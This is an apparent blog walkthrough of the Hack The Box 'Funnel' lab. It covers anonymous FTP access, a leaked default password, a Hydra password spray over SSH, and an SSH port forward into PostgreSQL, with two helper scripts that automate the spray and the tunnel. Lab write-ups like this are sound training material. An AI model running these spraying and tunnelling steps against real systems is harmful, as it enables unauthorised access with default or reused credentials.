The Be Sure Blog

Code Snippets | Problem Solving | Tips & Tricks


Funnel: Use local port forwarding to access the PostgreSQL DB

posted on 2.6.2023 by Below Surface in "Hack The Box"

Port scan (replace ip with the target machine's IP address; -sV asks nmap to identify the service and version behind each open port):

sudo nmap -sV ip

Relevant output:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Let's try to log in via FTP as the anonymous user (username: anonymous, empty password, just hit enter when prompted). Anonymous FTP hands the files to anyone who asks, which is the first misconfiguration on this box.

ftp ip
Name: anonymous
Password: (hit enter)

Success! Let's see what we got:

dir

Output:

229 Entering Extended Passive Mode (|||27324|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Nov 28  2022 mail_backup
226 Directory send OK.

Let's check what's inside the mail_backup directory:

cd mail_backup
ls

Output:

229 Entering Extended Passive Mode (|||18542|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp         58899 Nov 28  2022 password_policy.pdf
-rw-r--r--    1 ftp      ftp           713 Nov 28  2022 welcome_28112022
226 Directory send OK.

Let's download these two files and close the FTP connection:

get password_policy.pdf
get welcome_28112022
exit

First we view the contents of the welcome file:

cat welcome_28112022

Relevant output (email addresses):

Frome: root@funnel.htb
To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb

Now the password policy. cat is no use for a PDF, so we open the directory in the file manager and double-click the file (on Linux, pdftotext from poppler-utils dumps the text on the command line instead):

open .

Relevant file information:

For example the default password of “funnel123#!#” must be changed immediately.

We now have a list of email addresses (and therefore likely usernames) and a default password, so we can check whether any of these users never changed it. The server also has port 22 (SSH) open, so we try every username with the single password funnel123#!# in a password spraying attack with Hydra. Spraying one password across many accounts is the reverse of brute forcing one account, and it keeps each account far below any lockout threshold.


Let's create a list of usernames first:

cd temp
nano usernames.txt

Paste the usernames, one per line: the local parts of the addresses above, plus root. Then hit ctrl + o and enter to save, and ctrl + x to close the editor. sudo is not needed here; it would only leave you with a root-owned file. Check that your file looks like this:

cat usernames.txt      
root
optimus
albert
andreas
christine
maria

Then use Hydra to try the password against every username via SSH. -L reads the usernames from a file and -p is a single literal password; quote it in single quotes so the shell does not interpret the # and ! characters:

hydra -L usernames.txt -p 'funnel123#!#' ip ssh

Relevant output:

[22][ssh] host: 10.129.228.195   login: christine   password: funnel123#!#
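The two steps above, building the username list from the recovered mail header and spraying one password with Hydra, collected into one script. This is an added example and not code from the original post; the mail text is a constructed sample matching the headers shown above, and the variable name SPRAY_TARGET is my own. The spray only runs when SPRAY_TARGET is set to the target IP and hydra is installed; everything else works offline.

```shell
#!/bin/sh
# Added example: derive spray usernames from a mail header and hand them to Hydra.
# Assumptions: the welcome file looks like the one recovered from FTP (From/To
# headers with user@funnel.htb addresses); SPRAY_TARGET and the hydra binary are
# only needed for the last step, which is skipped when SPRAY_TARGET is unset.

# Read mail text on stdin, print the local part of every address once, in order
# of first appearance. -o prints each match on its own line; awk de-duplicates.
users_from_mail() {
    grep -oE '[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+' \
    | cut -d@ -f1 \
    | awk '!seen[$0]++'
}

# Constructed sample, mirroring the two header lines from welcome_28112022.
SAMPLE_MAIL='Frome: root@funnel.htb
To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb'

# Same list as a single space-separated string, convenient for callers and checks.
user_list() {
    printf '%s\n' "$SAMPLE_MAIL" | users_from_mail | tr '\n' ' ' | sed 's/ $//'
}

# Write usernames.txt and spray ONE password across all accounts.
# -t 4 follows Hydra's own advice for ssh (more parallel tasks get connections
# dropped), and one password per account stays under typical lockout limits.
spray_ssh() {
    target=$1
    password=$2
    printf '%s\n' "$SAMPLE_MAIL" | users_from_mail > usernames.txt
    hydra -L usernames.txt -p "$password" -t 4 "ssh://$target"
}

# Only touch the network when a target was supplied explicitly.
if [ -n "${SPRAY_TARGET:-}" ]; then
    spray_ssh "$SPRAY_TARGET" 'funnel123#!#'
fi
```

Run it as SPRAY_TARGET=10.129.228.195 sh spray.sh against your own lab box; without the variable it just builds the list, which is the part worth re-using on the next machine that leaks a mail dump.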

We got a working username for the default password! Let's SSH into the machine with these credentials.

ssh christine@ip
(answer yes to the host key prompt)
password: funnel123#!#

Yeah, we got in! Let's see some more info about this account:

id

Relevant output:

uid=1000(christine) gid=1000(christine) groups=1000(christine)

Let's explore this server. With ss (socket statistics) we can list every socket the box is listening on, including those bound only to the loopback interface, which nmap could not see from outside. The -l flag limits the output to listening sockets and -t to TCP:

ss -tl

Output:

State     Recv-Q    Send-Q         Local Address:Port               Peer Address:Port    Process    
LISTEN    0         4096               127.0.0.1:34313                   0.0.0.0:*                  
LISTEN    0         4096           127.0.0.53%lo:domain                  0.0.0.0:*                  
LISTEN    0         128                  0.0.0.0:ssh                     0.0.0.0:*                  
LISTEN    0         4096               127.0.0.1:postgresql              0.0.0.0:*                  
LISTEN    0         32                         *:ftp                           *:*                  
LISTEN    0         128                     [::]:ssh                        [::]:*                 

The entry of interest is the PostgreSQL database. By default ss replaces well-known port numbers with service names; add -n to print the numeric port instead:

ss -tln

Output:

State      Recv-Q     Send-Q         Local Address:Port           Peer Address:Port     Process     
LISTEN     0          4096               127.0.0.1:34313               0.0.0.0:*                    
LISTEN     0          4096           127.0.0.53%lo:53                  0.0.0.0:*                    
LISTEN     0          128                  0.0.0.0:22                  0.0.0.0:*                    
LISTEN     0          4096               127.0.0.1:5432                0.0.0.0:*                    
LISTEN     0          32                         *:21                        *:*                    
LISTEN     0          128                     [::]:22                     [::]:*                   

PostgreSQL listens on port 5432, but only on 127.0.0.1, so it is reachable from the box itself and from nowhere else. The psql command line tool would let us talk to it, but running:

psql

Outputs:

Command 'psql' not found, but can be installed with:
apt install postgresql-client-common
Please ask your administrator.


We have no admin rights on this server, so instead of installing anything there we use SSH local port forwarding: ssh opens a listening port on our own machine and relays whatever arrives there through the SSH session to a port on the server side. Close the SSH connection and reconnect with:

exit
ssh -L 1234:localhost:5432 christine@ip
password: funnel123#!#

The -L argument has the form local_port:destination_host:destination_port, and the destination is resolved on the server, so localhost here means the target's own loopback interface, exactly where PostgreSQL listens. We are logged in as before. But when we run, in a second terminal on our own machine:

ss -tlpn

we can see that ssh has opened a listening socket on our local machine on port 1234 (the -p flag shows the owning process); anything we send there is forwarded to port 5432 on the server.

LISTEN  0       128          127.0.0.1:1234           0.0.0.0:*      users:(("ssh",pid=1855,fd=5))
LISTEN  0       128              [::1]:1234              [::]:*      users:(("ssh",pid=1855,fd=4))


Now, on our local machine, we point psql at the forwarded port and the connection lands on the PostgreSQL service on the target. We try christine's SSH password again, since passwords are often reused between services:

psql -U christine -h localhost -p 1234
password: funnel123#!#

And it worked!

psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
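The ss enumeration and the tunnel steps above as one script. This is an added example, not code from the original post. It has two parts: loopback_ports takes ss -tln output from the target (a constructed sample matching the listing shown earlier) and prints the TCP ports bound only to 127.x addresses, i.e. the services an external scan never sees and that need a tunnel; pg_over_tunnel then opens the -L forward in the background with a couple of options that make it fail loudly instead of silently, checks the local end is listening, queries the database through it and tears the tunnel down. The names TUNNEL_TARGET, TUNNEL_USER and LPORT are my own, and the tunnel part only runs when TUNNEL_TARGET is set and ssh, ss, pgrep and psql are installed on the attacking machine.

```shell
#!/bin/sh
# Added example: find loopback-only listeners in ss output and reach one through
# an SSH local port forward. Assumptions: ss output format as on the page;
# TUNNEL_TARGET/TUNNEL_USER/LPORT are hypothetical variable names; psql,
# pgrep and ss exist on the attacking machine.

# Read `ss -tln` output on stdin, print the port of every LISTEN entry whose
# local address is in 127.0.0.0/8. The port is the last colon-separated field
# of column 4, which also copes with entries like 127.0.0.53%lo:53.
loopback_ports() {
    awk '$1 == "LISTEN" && $4 ~ /^127\./ { n = split($4, a, ":"); print a[n] }'
}

# Constructed sample, mirroring the listing taken on the target.
SS_SAMPLE='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096       127.0.0.1:34313      0.0.0.0:*
LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*
LISTEN 0      4096       127.0.0.1:5432       0.0.0.0:*
LISTEN 0      32                 *:21               *:*
LISTEN 0      128             [::]:22            [::]:*'

# The loopback-only ports of the sample as one space-separated string.
loopback_ports_sample() {
    printf '%s\n' "$SS_SAMPLE" | loopback_ports | tr '\n' ' ' | sed 's/ $//'
}

# Open the forward, verify it, query PostgreSQL through it, close it again.
pg_over_tunnel() {
    target=$1
    user=$2
    lport=${3:-1234}
    # -N: no remote shell, -f: go to the background once authenticated.
    # ExitOnForwardFailure makes ssh exit non-zero if the local port is already
    # taken, instead of leaving you with a session and no forward. Binding
    # 127.0.0.1 explicitly keeps the forwarded port off other local interfaces.
    ssh -f -N -o ExitOnForwardFailure=yes \
        -L "127.0.0.1:${lport}:127.0.0.1:5432" "${user}@${target}" || return 1
    # Locate the backgrounded ssh by its forward spec so it can be killed on exit.
    sshpid=$(pgrep -f "127.0.0.1:${lport}:127.0.0.1:5432")
    trap 'kill $sshpid 2>/dev/null' EXIT
    # The local end must now show up as a loopback listener on our own machine.
    ss -tln | loopback_ports | grep -qx "$lport" \
        || { echo "forward on port $lport is not listening" >&2; return 1; }
    # Same credentials as for SSH; psql prompts for the password.
    psql -h 127.0.0.1 -p "$lport" -U "$user" -d secrets -c 'SELECT * FROM flag;'
}

# Only touch the network when a target was supplied explicitly.
if [ -n "${TUNNEL_TARGET:-}" ]; then
    pg_over_tunnel "$TUNNEL_TARGET" "${TUNNEL_USER:-christine}" "${LPORT:-1234}"
fi
```

Run it as TUNNEL_TARGET=10.129.228.195 sh tunnel.sh. Feeding the target's ss -tln output to loopback_ports is the reusable part: every port it prints is a candidate for the same -L trick, and 34313 here is just as worth a look as 5432.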

Let's list the databases:

\l

Outputs:

   Name    |   Owner   | Encoding |  Collate   |   Ctype    | ICU Locale | Locale Provider |    Access privileges    
-----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
 christine | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 postgres  | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 secrets   | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            |
 template0 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
 template1 | christine | UTF8     | en_US.utf8 | en_US.utf8 |            | libc            | =c/christine           +
           |           |          |            |            |            |                 | christine=CTc/christine
(5 rows)

What's inside secrets? First press q to leave the pager that displays the listing (\q would quit psql altogether), then switch to the database:

\c secrets

Output:

psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
You are now connected to database "secrets" as user "christine".

Let's view the tables:

\dt

        List of relations
 Schema | Name | Type  |   Owner   
--------+------+-------+-----------
 public | flag | table | christine
(1 row)

Let's view the content of flag:

SELECT * FROM flag;

Congrats!

Tags:

hack the box
local port forwarding
tunneling
password spraying
hydra
ftp
nmap
ssh
postgresql
psql

Sources:

https://app.hackthebox.com/starting-point
